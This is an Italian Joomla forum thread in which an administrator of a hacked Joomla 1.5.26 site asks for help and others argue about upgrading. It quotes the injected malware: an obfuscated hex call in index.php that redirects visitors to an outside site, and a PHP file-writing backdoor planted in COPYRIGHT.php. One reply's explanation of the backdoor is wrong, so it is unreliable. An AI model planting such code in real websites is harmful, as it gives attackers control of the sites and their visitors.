Joomla.it Forum

Non solo Joomla... => Sicurezza => : mimedia 11 Feb 2013, 10:37:04

: Sito attaccato
: mimedia 11 Feb 2013, 10:37:04

Ciao a tutti,
volevo segnalare un paio di attacchi avvenuti il primo mi ha sostituito il contenuto dell'index.php con quello che allego.
Dopo aver rispristinato il tutto (azzerando l'account FTP) stamattina, aprendo il sito, ricevevo un errore di sintassi. Apro index.php e ho trovato queste righe aggiunte nel codice:
[...]
define( 'DS', DIRECTORY_SEPARATOR );
require_once ( JPATH_BASE .DS.'includes'.DS.'defines.php' );
$x0b="h145x61144er";
$x0b("R145146x72ex73x68x3ax20x32x3573 165x72lx3d"httx70:x2f57142x6cux65150ox73164x2dx64x7a.x63o m57wx69x6bi"");
[...]

versione installata 1.5.26

Non migro se il cliente non vuole mettere sul tavolo nemeno un eurino per farlo :)

[allegato eliminato da un amministratore essendo vecchio più di un anno]

: Re:Sito attaccato
: mimedia 14 Feb 2013, 08:27:55

Aggiornamento sull'attacco:
il file COPYRIGHT.php è stato modificato in questo modo, cosa fa o tenta di fare questo codice?:

:

Restricted accoss
<?php
error_reporting(0); 
ini_set("max_execution_time",0); 
ini_set("default_socket_timeout", 2); 
ob_implicit_flush (1); 
$file = "".$_POST["path"];
$fh = fopen ($file, 'w') or die("");
echo fwrite ($fh, stripslashes($_POST["raw_data"]));
fclose($fh);

: Re:Sito attaccato
: BelinBelan 14 Feb 2013, 12:33:31

uhmmm a occhio e croce scrive tutto quello che passa nelle url del sito: username/password.. etc..

: Re:Sito attaccato
: tomtomeight 14 Feb 2013, 18:21:29

Non migro se il cliente non vuole mettere sul tavolo nemeno un eurino per farlo  :)

Pensa a noi quanto ci può importare  :) o forse dobbiamo fare noi una colletta?   ;D

: Re:Sito attaccato
: BelinBelan 14 Feb 2013, 20:57:12

Mimedia, un consiglio spassionato:

questi "virus" passano prima dal tuo pc e poi "invadono" anche il tuo sito...

Un bel formattone al pc... una tabula rasa del sito...

Un bel antivirus tipo AVast sul nuovo pc re-installato e poi rifai tutto da capo.. ;)

: Re:Sito attaccato
: mimedia 15 Feb 2013, 10:40:47

Insomma...
Il mio pc è protetto proprio con avast, almeno due volte alla settimana eseguo scansioni complete del sistema, verifico anche con Combofix e McAfee e non ho mai trovato nulla (Windows 7).
Per dire che ok dare consigli, ok che formattare pc, server, rifare il sito, cambiare stile di alimentazione e fare moto aiutano a vivere meglio però mi sembrano soluzioni, nella loro indubbia efficacia, piuttosto drastiche.

Da questo pc accedo ad almeno una ventina di domini che non hanno (fino ad ora :) ) problemi

per tomtomeight, nessuna colleta richiesta solo volevo evitare risposte scontate tipo "Aggiorna alla 2.5" (senza considerare quelli che consigliano la 3.0 solo perchè ha un numero più grande) quando il sito non è il mio ma di un cliente che non vuole spendere..

Come ho scritto è un 1.5.26 (Last stable) aggiungo con solo due plugin installati : Joom!fish 2.2.3  e JCE 2.3.1 (non ha nemmeno il login da frontend) Credo che se ho subito l'attacco è perchè, evidentemente, questa configuarazione ha delle falle... oppure le ha il server che mi ospita (hosting condiviso)

Ho chiesto un log del server per vedere che tipo di attività anomale si sono verificate ma ancora non l'ho visto

: Re:Sito attaccato
: tomtomeight 15 Feb 2013, 12:49:15

per tomtomeight, nessuna colleta richiesta solo volevo evitare risposte scontate
tipo "Aggiorna alla 2.5" (senza considerare quelli che consigliano la 3.0 solo
perchè ha un numero più grande) quando il sito non è il mio ma di un cliente che
non vuole spendere..

Ma allora se non ti paga stai già lavorando aggratis per risolvere la questione attacco? Mi chiedo, se invece non lo fai gratis come credo, taglia la testa al toro ed aggiornalo, fai prima e risparmi tempo, ti resta un cliente soddisfatto che sicuramente ti ripagherà della differenza  di costo che sicuramente c'è fra mettere una pezza e risolvere con aggiornamento, con buona propaganda. Ricordati che il cliente è sempre il capo di ogni azienda, piccola o grande che sia, è lui alla fine che ti e vi paga lo stipendio.

: Re:Sito attaccato
: mimedia 15 Feb 2013, 14:16:15

lavoro gratis...
sì e no,
no nel senso che il servizio di rivendita hosting mi da margine sufficiente per ripristinare un backup del sito in qualche click.
sì nel senso che è mio zelo capire come il sito, se pur aggiornato nelle sue componenti, è stato hackerato.

Quello che dici ha sicuramente le sue ragioni teoriche che però, a mia sindacabile opinione, nella pratica si traduce in un impegno di risorse non indifferenti:
purtroppo la migrazione da 1.5 a 2.5 non è automatica, c'è da rivedere il template grafico, c'è da realizzare la struttura multilingua completamente rivoluzionata, c'è da mettere in conto gli inevitabili aggiornamenti periodici dell'ultima versione...
Anche se è un confronto costruttivo, siamo andati un pochino ot :)